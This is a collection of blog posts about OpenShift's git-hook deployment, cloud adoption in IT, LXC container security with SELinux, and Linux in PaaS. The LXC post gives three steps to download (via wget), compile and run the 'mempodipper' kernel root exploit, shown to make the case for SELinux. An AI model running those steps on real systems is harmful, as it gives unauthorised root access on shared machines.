Building an Open Source PaaS Deployment Model

To some, cloud is an excuse to introduce “black box” processes that lock users into their services.  But they can’t really come right out and say that.  Instead they distract from their approach with fanciful names and tell us that the cloud is full of magic and wonder that we don’t need to understand.  This type of innovation is exciting to some, but to me, combining innovation with a lock-in approach is depressing.  In the past, we’ve seen it at the operating system level and the hypervisor level.  We’ve also seen open source disrupt lock-in at both levels and we are going to see the same thing happen in the cloud.

When we started designing and building OpenShift, we wanted to provide more than just a good experience to end users that, in turn, locked them in to our service.  One of the early design decisions we made on OpenShift was to utilize standards as much as we could and to make interactions transparent at all levels.  We did want the user experience to be magical but also completely accessible to those wanted to dig in.  To demonstrate this, let’s walk through the deployment process in OpenShift – arguably the most magical part of the entire offering…

As we were designing a PaaS service, focused on developers, our first goal was to make the deployment process as natural as possible for developers.  For most developers, their day to day process goes something like code, code, code, commit.  For those questioning this process already let me speak on behalf of the developer in question by saying

Tests?! Of course I’ve already written the tests!  They were in the third ‘code’!

Anyway, we wanted to plug into that process and to do that we chose git.  The reason for selecting git over more centralized source code management tools like subversion was that the distributed nature of git allowed the user to have full control over their data.  The user always had access to their entire historical repository and as developers, we thought that was a critical requirement.  Given that, we standardized on git as the main link between our users’ code and OpenShift.

Now let’s look at what that development process might look like in practice.  First, you start off with the code, code, commit part:

vi 
# make earth shattering changes
git commit -a -m "My earth shattering comment"

The next part of the process for those familiar with git is the publish process.  You run a ‘push’ command to move your code from your local repository to your distributed clones.  So when you run:

git push

Your code is transferred to OpenShift and automatically deployed to your environment.  Regardless of whether code needs to be compiled, tests need to be run, dependencies need to be downloaded, a specific packaging spec needs to be built – it all happens on the server side with this one command.  To do this we utilize a git hook to kick off the deployment process.  Wait – I know what you are thinking…

What?!  Just a git hook?!  This is the cloud baby!  Shouldn’t this be custom compiling my code into a Zeus Hammer to perform a magical Cloud Nuclear transfer?!!

If you ask us, a git hook works just fine because it’s what you would probably do yourself.  We simply .  That script invokes a series of scripts (called hooks) representing various steps in the deployment process.  Some of the hooks are provided by the cartridge that your application is using and some of the scripts are provided by the application itself.  This approach let’s the cartridge provide base functionality that can be further customized by the application.

First let’s talk about the cartridge hooks.  Having cartridge specific hooks is important because each cartridge needs to do different things in their deployment process.  For example, when a Java cartridge detects a deployment, we want to do a Maven build, but when a Ruby cartridge detects a deployment, it should execute Bundler.  The cool part is that each individual cartridge can override anything it needs to in the default process.

Let’s look at how the Ruby cartridge implements this.  We can look at the ruby-1.9 cartridge’s overridden .  When you use the Java cartridge, it leverages Maven in the build process .  You can implement the pieces that are right for your cartridge where it makes sense and still utilize the generic process everywhere else.  In isolation, each individual script is really quite simple.  In aggregate though, all those extensions can become extremely powerful and do much of the heavy lifting on behalf of the users.

But, what if you want to change the default behavior for a specific application?  No problem!  You have a collection of .  You could put your own code in pre_build, build, deploy, post_deploy or wherever else it makes sense.These are found in your application in ~/.openshift/action_hooks.  They are invoked just like the cartridge hooks as part of the deployment process.  For example, you can see how the .  What you choose to do with these hooks is your decision.  Put some code in them and they will get called at each step in the deployment process.  This let’s you not only leverage the power of a customized cartridge, but also let’s you tweak and tune so things are just right for your application.

At the end of the day, harnessing the power of the cloud doesn’t need to lock you into a vendor.  At OpenShift, we believe that transparency, standards and extensibility will make a process that lasts the test of time.  I hope this has provided some visibility to how the OpenShift deployment model works and also has given you some insight into navigating the codebase.  And if this has peaked your interested and you find yourself digging through more and more code, please reach out and get involved.

IT Cloud Myths around Dynamic Demand (or the lack thereof….)

Today I read a great article that compared the adoption of cloud in IT to the adoption of open source.  In a nutshell, cloud is being resisted by IT groups much like open source used to be resisted.  Given my role on OpenShift and having been at Red Hat for several years, I’ve seen both forms of this resistance in the field.  In this post, I’ll try and debunk one of the most common IT dismissals of utilizing cloud:

I don’t have dynamic demand – cloud won’t help me

That is a tricky defense tactic because many people in IT believe it to be true.  To dispel this myth, I find it best to break demand into external and internal demand.

It is fairly easy to tell whether your company has dynamic external demand.  That usually boils down to whether or not you have seasonal demand (e.g. retail sites and Black Friday) or event driven demand (e.g. Superbowl ad).  Companies with seasonal or spiky production demand have an obvious use case for the elasticity of cloud but that is only half the story.

However, while relatively few companies have dynamic external demand, the vast majority of IT shops have an unknown dynamic demand internally: their own consumers and development teams.  But when first asked, they often believe this not to be the case.  The conversation usually goes this way:

Question: Are you giving your users all the resources they think they need?

Answer: No.  They always ask for more than they need and we don’t have the capacity.  The initial requests just aren’t reasonable.

Question: Is the process for getting resources easy or self-service or does it require a ton of justification and cost?

Answer: We have to make the process tough.  If we gave users what they asked for, we’d go broke!

Question: Do your users ever give back unused resources or do they try and hold on to them forever?

Answer: That’s just it – they never give anything back!  They would keep it forever if we didn’t watch them like hawks and claw it all back…

At that point, this is the question that often makes them re-think their initial assumption about not having dynamic demand internally:

Question: If you gave users everything they wanted and were able to recoup those resources when they weren’t used, would you have dynamic demand?

Answer: (long pause) Yeah…. I guess we would.  (long pause) Haven’t thought about it that way before…

I’ve had this same conversation play out time and time again.  Most of the guys on the IT side aren’t knowingly being malicious, but they have built a protective system over the course of years and have lost sight of what their users actually need.  They think that they are protecting users from themselves whereas in reality, they are eliminating themselves as a credible service provider.  Under-served users will just go directly to the public cloud providers and work around IT entirely.  This has been happening with SaaS offerings such as Salesforce.com for years and the behavior will be no different with public cloud providers.

IT organizations that embrace these changes will more likely end up being a strategic partner with their users.  By leveraging cloud technologies instead of rejecting them, they can revolutionize the way they provide compute resources to their users and combine that with the valuable corporate data they already have.  Having worked in IT, I think this is underlying desire of many IT shops.  Unfortunately, the processes they have built for themselves are often working against that desire without them even knowing.  Those that will survive will need to change and change fast to maintain relevance.

Are LXC containers enough?

First off, let me state that I think the LXC project is great.  In previous blog posts, I’ve talked about segmenting existing virtual machines to securely run multiple workloads and achieve better flexibility, cost, etc.  This concept is often referred to as ‘Linux Containers’ and creating these containers with the LXC project is a very popular approach.  LXC  aggregates a collection of other technologies such as Linux Control Groups, Kernel Namespaces, Bind Mounts and others to accomplish this in an easy way.  Good stuff.  The question however, is whether LXC alone is enough to give you confidence in your approach to utilizing Linux containers.

In the words of Dan Berrange:

Repeat after me “LXC is not yet secure. [. . .]”

In other words, no it’s not enough.  The main problem right now is that LXC doesn’t have any inherent protection against exploits that allow a user to become root.  In the world of Linux, traditionally if you have root you can do anything.  When using containers, that means that if one container can find a way to become root on the machine, it can do whatever it wants with all the other containers on the box.  I think the official term for that situation in IT is a ‘cluster’.  While the concept of capabilities is being introduced into the kernel to help segment the abilities that root actually has, that is a long ways out from being a realistic defense, especially on the production systems in deployment today.

How realistic are these exploits, though?  To many, the concept of a kernel or security exploit is something they would rather believe just doesn’t actually happen.  Maybe they prefer to think that it’s limited to the realm of academic discussions.  Or maybe they just believe it’s not going to happen to them.

Unfortunately, the reality is quite different.  While I agree that finding an exploit requires an amazing amount knowledge and creativity, using an exploit for malicious purposes isn’t that challenging.  For example, let’s look at the excellent article written by Jason A. Donenfeld about a kernel exploit that is able to achieve root access.  Jason explains how this exploit works in amazing detail here – http://blog.zx2c4.com/749.  Believe me, discovering that and writing that article was a LOT of work.  But now, let’s look at how easy it is to use that exploit on unpatched kernels:

  • Download the provided C program (e.g. wget http://bit.ly/wELTpn)
  • Compile it (gcc mempodipper.c -o mempodipper)
  • Run it and get root access (./mempodipper)

Pretty scary huh?  Three steps and I could get root on your machine.  I can hear the sighs of relief already though, as people start thinking:

I don’t have to worry about this since I don’t let people run arbitrary code run on my machines…

Let’s discuss that train of thought for a minute.  First, let’s approach this from the perspective of a Platform as a Service (PaaS).  A PaaS essentially allows users to run their own code on machines shared by many.  That means experimenting with an exploit like this in a PaaS environment isn’t very difficult at all.  And remember, if any user can get root on that system, they own all the applications on it.

Not consuming or hosting a PaaS?  Well, I’ve spent many years in IT shops and the traditional IT deployments for large companies don’t look all too different.  Granted, the code is usually coming from employees and contractors, but you still probably don’t want to risk root exposures by anyone that is able to deploy a change into your environment.

Well if LXC doesn’t protect against this and my traditional environments are susceptible as well, is there any hope at all?!?!  Thankfully, there is.

The solution is using SELinux in combination with whatever container technologies you are using.  With an SELinux policy, you are essentially able to control the operations of any running process, regardless of what user they happen to be.  SELinux provides a layer of protection against the root layer where most other security mechanisms fail.  When a user is running in a SELinux context on a system and tries an exploit like the one above, you have an extra line of defense.  It’s easy for you to establish a confined environment that limits riskier operations like syscalls to setuid and restricts memory access which, in turn, would stop this exploit and others.  Most importantly, you can get consistent protection across any process, no matter what user they are running as.

You can think of SELinux as a whitelisting approach instead of blacklisting.  The traditional model of security (often referred to as Discretionary Access Control or DAC) requires protecting against anything a user should not be able to do.  Given the complexity of systems today, that’s becoming unrealistic for mere mortals.  The SELinux model of security (often referred to as Mandatory Access Control or MAC) requires enabling everything a user should be able to do.

While it’s not a silver bullet, it’s an elegant mitigation in many areas.  Many types of IT hosting are becoming increasingly standardized and you can put in place fairly simple policies that specify what users should be able to do.  For web applications, you are going to allow binding to HTTP / HTTPS ports.  You are going to probably allow JDBC connections.  You can describe the allowed behaviors of many of your applications in a fairly concise way.  Thinking of security this way mitigates many of the exploits that take a creative path like the one above (setuid access, /proc file descriptor access, and memory manipulation).  Unless you have a pretty special web application, it’s safe to say it shouldn’t be doing that stuff :)

Interested in learning more?  The place I recommend to start is with the Fedora documentation.  Fedora and RHEL have some of the best SELinux policies and support in the industry.  The documentation covers everything from learning SELinux to debugging it.  Most importantly though, don’t get fooled into thinking all Linux distributions are the same.  While SELinux support is in the kernel, what really matters is the ecosystem of policies that exist.  In Fedora or RHEL, you get whitelists ready-made for a slew of well known systems like Apache.  In many other distros, you’d spend your time having to recreate that work for the standard systems and never have any time to focus on your application policies.  Probably not your best use of time and would be a daunting first experience with SELinux to say the least.

My last disclaimer is that even as powerful as SELinux is, I wouldn’t recommend on putting all your eggs in one basket when it comes to security.  Combine SELinux with other security measures and maintain traditional operational best practices to minimize your exposure (e.g. apply security updates, audit, etc).  In other words, use it as an enhancement to what you do today, not a replacement.

Well, if you’ve made it this far, I’ll assume you are a convert: Welcome to the world of SELinux and sleeping a little better at night!

Red Hat Summit Recap – 2012

Last month we had our annual Red Hat Summit.  I always look forward to Summit as it gives me the ability to connect with users and customers at a frequency that I don’t get on a daily basis.  I try and spend as much time as I can with users and customers, both in understanding their current needs as well as deducing some trends for the upcoming year.  Here are my conclusions for the 2012 Summit:

1. IT shops are moving beyond basic virtualization (finally!)

Now, this is probably a bit skewed since I’m an OpenShift guy and tend to be asked a lot of PaaS / IaaS / Cloud questions, but there was something different this year.  The questions I was being asked had enough depth that it wasn’t just casual prodding of things to expect with ‘cloud’, but questions from customers that had been through designs and experimentation themselves.  This was an exciting change for me because it means that IT shops are becoming comfortable enough with the core capabilities like virtualization and provisioning to pursue more.  Private cloud and IaaS capabilities are maturing quite a bit and there was a lot of questions on usage and expectations on all fronts.  The big issue everyone was bumping up into with the public cloud was data locality and regulations.  I think that is going to be a challenge for years to come but luckily private cloud solutions are getting more robust which will let IT shops in that predicament still compete.  In fact, Red Hat announced our Enterprise PaaS offering which includes offerings installable in customer data centers.  I think being able to bridge the private and public cloud is going to be a key requirement for any vendor looking to compete in this space.

2. SELinux is getting more popular with cloud deployments

I’m not used to being asked SELinux questions at all really.  Heck, I’m usually the guy promoting it at conferences and educating people on it.  So by the 3rd or 4th time SELinux conversations were coming up, I had to wonder what was changing.  My conclusion is that with most things cloud, achieving maximum density and cost effectiveness is usually a primary goal.  However, in many cases, extreme density comes at the cost of security.  Given the amount of security exposures that made big headlines recently, it appears that a refocusing on the security side of solutions is occurring.  It also appears that people are starting to realize that SELinux provides a very elegant solution to help avoid having to make this compromise.  SELinux provides a layer of security at the kernel that allows you to securely segment filesystem and process interactions (among other things).  This allows you to run a variety of workloads on the same machines, using and overcommitting the underlying resources as necessary without giving up the ability to segment those applications.  Segmentation used to be something only attempted at a virtual machine or physical machine level.  That is no longer be the case.  On OpenShift we’ve been a fan of this approach for a long time and it’s worked extremely well.  Glad that others are looking at the same model.

3. Developer efficiency is becoming a focus of IT shops

Okay, this one is definitely biased since I’m a PaaS guy.  That said, before I was a PaaS guy, I was an IT guy.  I worked on both the development and the operational side of the house for several years.   One of things I learned with operations is that they traditionally care more about the running system than the development process.  The opposite was true for development – they often ignore the complexities of keeping their code running and focus on cutting new code.  However, as operations generally controls much of  the IT budget, it was always a struggle to actually get the development side of the house productive.  In 2009, the idea of a DevOps model was introduced which would bring both sides of IT closer together and harmony would ensue… Why then has it taken until 2012 for this to start to take hold?  I think that very strong catalyst was needed to force a change in the existing behavior.  And these days, there are quite a few catalysts that are forcing change in many companies: the public cloud, the economy and startup competition.  For the first time in a while, I was talking with customers that were legitimately trying to bring their development and operational processes together.  In some cases, it was an operational change driven by the transparency of public cloud pricing and realizing that if they couldn’t compete, developers could get services elsewhere.  In some cases it was the economic pressure pushing companies to do more with less.  And in other cases, it was the realization of what some very small companies have been able to achieve just using cloud-based services.  Whatever the motivation, companies are re-invigorated to compete and ready to change to make that happen.  I love seeing that and I think these companies will be the ones that push the boundaries of PaaS offerings and help that space to continue to evolve.

Will Linux be Relevant in the Cloud?

Those that know me probably know where this is going.  However, for those of you that do not know me, I’ll state my stance up front:

I do not understand that logic behind the argument that the operating system will become less relevant in the cloud.  That is a fallacy.

I realize that this is a popular messaging approach for some vendors that have a minimal stake or understanding of the operating system.  However, please don’t get pulled into that marketing machine.  Let’s try and look at this from a more practical standpoint.  I often hear this reasoning brought up in the following context:

  • You don’t care what operating system you are running in the cloud.  You only have to care about your application.

I spend my days building a Platform as a Service (PaaS) offering (aka OpenShift) so I’m particularly sensitive to this argument.  While I agree that our goal on OpenShift is to make the developer experience as simple as possible, everything beyond the initial registration experience today is going to take you to interacting with the operating system at some level.  Beyond your personal machine setup, technologies like SSH are heavily used in PaaS offerings.  In addition to being the backbone of the mundane functions like supporting authentication and providing the underlying protocol for git transfers, it’s also often used directly by developers to support use cases like debugging.  When your applications are running on remote machines, being able to port forward, attach local debuggers and poke and prod from your laptop is critical.  Technologies in Linux like SSH make that possible.

Okay, so maybe SSH is important, but what other aspects of the operating system should you have to care about?  I guess that is where the disconnect is to me.  A PaaS, or any cloud service, should support and allow you to leverage common tools and standards to the greatest extent possible.  Why?  Because a lot of people already know them and it makes those users more productive.  Why on earth would your users want to go re-implement everything to your standard?  If you love rsync and want to use rsync over SSH, it should just work.  If you want to schedule something on your PaaS application, you should be able to use cron.  If you want to shell out and script something from your PaaS instance, you should be able to run a Bash / Perl script and have all the standard tools just work.

Now, don’t get me wrong, I don’t think you should be forced to use this stuff but it should be there as an option.  Why?  Because the tools that have worked in Linux for decades still work extremely well.  Maybe better tools will be written in Ruby or Python for your use case and I would encourage you to use them if that is the case.  Experimentation is critical, but it’s usually most productive if you are building on a stable base.  In the cloud, just like in the data center, that base is Linux.

So far, I’ve really only focused on the end user experience and hopefully it’s apparent that even causal cloud users are still going to interact with the operating system regularly.  Now if the end users of cloud services are still going to be exposed to the operating system, imagine the people that are building those services!  At the end of the day, your competitive edge will be knowing the operating system so that you don’t waste time rebuilding things that already exist.  On OpenShift for example, we use bleeding edge operating system functionality such as Linux control groups and filesystem polyinstantiation to help provide workload management and segment users.  We could have built something to do that, but if there is already a robust solution already in the operating system, why build something new?  We use SELinux for security because trying to build a rock solid security layer outside of the kernel is practically impossible.  We use quota for managing filesystem allocations, we use for traffic control, PAM for authentication support and the list goes on and on.  Using the functionality that exists in Linux allows us to focus on our goal of making the developer experience in the cloud easier.  We get to focus on challenges that the operating system does not solve like automatically scaling your applications.  Our understanding of Linux allows us to not waste time reinventing the wheel.

I’m not completely unreasonable.  I do agree that the cloud will affect how you use Linux to some extent.  The hardware layer is being abstracted to a large degree.  That means will probably spend more time using networking technologies like SSH than you will messing with SAN configurations.  The toolset you use from day to day will shift slightly, but it will be a slight shift, not a replacement.  But at the end of the day, the operating system will still be a critical tool in your toolbox.  And in the cloud, that operating system is Linux.

What PaaS means to virtualization

Over the next few years, we expect to see a tremendous focus on technologies to help isolate applications and workloads within a virtual machine. This is a bit of a controversial topic because in the minds of many, that is exactly what virtualization is geared to do. Now don’t get me wrong, I’m a huge fan of virtualization, but I think it’s merely one weapon in the challenge of increasing efficiency and utilization – not the silver bullet. I also believe that the next battle of efficiency and utilization is going to occur in the Platform as a Service (PaaS) space. To achieve the highest levels of efficiency yourself is a challenging undertaking, but consuming these new tools via a PaaS is easier. In this post I’m going to try and demystify what is going on under the hood of the best PaaS offerings out there.

First let’s take a look at the past to make sure we all start on the same page. In the olden days (i.e. pre Y2K), the most common situation was to have a single piece of hardware, that ran a single operating system and a single application. Given the commodity hardware on the market, this worked really well. In most companies, when you wanted a new application deployed, you bought a new piece of hardware and installed that application on it. Pretty simple.

In the following years though, things started changing. First, more companies started depending on IT for a competitive edge. This drove most investment into IT, but also more scrutiny on how IT was spending its money. Improving the utilization of your machines became a pretty hot topic. At the same time, hardware was improving at a ridiculous pace. The model of installing a single application per physical piece of hardware was getting wasteful. More often that not, this approach wasn’t even using 10% of the hardware capabilities. Whether you were a Silicon Valley startup or a Fortune 100 company, you didn’t want 90% of your investment just sitting there.

Then, virtualization entered into the equation. Virtualization allowed a complete abstraction between the operating system and the actual hardware that it was running on. This allowed a single piece of hardware to run lots of operating system instances. Without changing any of the applications, companies could now take racks of machines and consolidate them all onto a single piece of hardware. Hardware that once sat lonely and idle, barely waking up to process their requests was now sweating under the load.

These days though, virtualization is commonplace. Virtualized infrastructures are no longer a differentiator, they are an expectation. And with Infrastructure as a Service providers (IaaS), you can get virtual machines in seconds, with impressive pricing. Now that everyone has access to this technology and anyone can achieve that first big jump in utilization, what is going to separate you from the pack?

What is going to make you stand out is your understanding of how to squeeze every drop of performance out of each virtual machine. If you are still running a single virtual machine for every application in your environment, you might be achieving great utilization (i.e. your machines are sweating like crazy) but you are probably wasting a lot more than you should. This approach was required at first because the tooling to properly segment lots of different applications on a single machine just wasn’t there. That’s not the case anymore. With the advances in Linux with technologies like Security Enhanced Linux (SELinux), Kernel Namespaces and Linux Control Groups, it’s time to re-evaluate how we are doing stuff.

So how does all this relate to Platform as a Service (PaaS)? Just like IaaS offerings such as  made virtualization available to everyone, the vast majority of users are going to harness these new levels of efficiency through Platform as a Service (PaaS) offerings. PaaS offerings, like Red Hat’s OpenShift PaaS, are built on top of virtualization and exist to make both developers and operations more productive.

While I can’t speak for all the PaaS offerings out there, I can say that OpenShift exists to tweak and tune everything possible to help make each virtual machine as effective as possible. At the same time, we strive to make all those gory details invisible to the developers. Since we are built on an open source technology stack, the ability to do it yourself is there and I would encourage you to check out OpenShift Origin and get engaged if you are interested in the technology that is going to make virtualization even more powerful.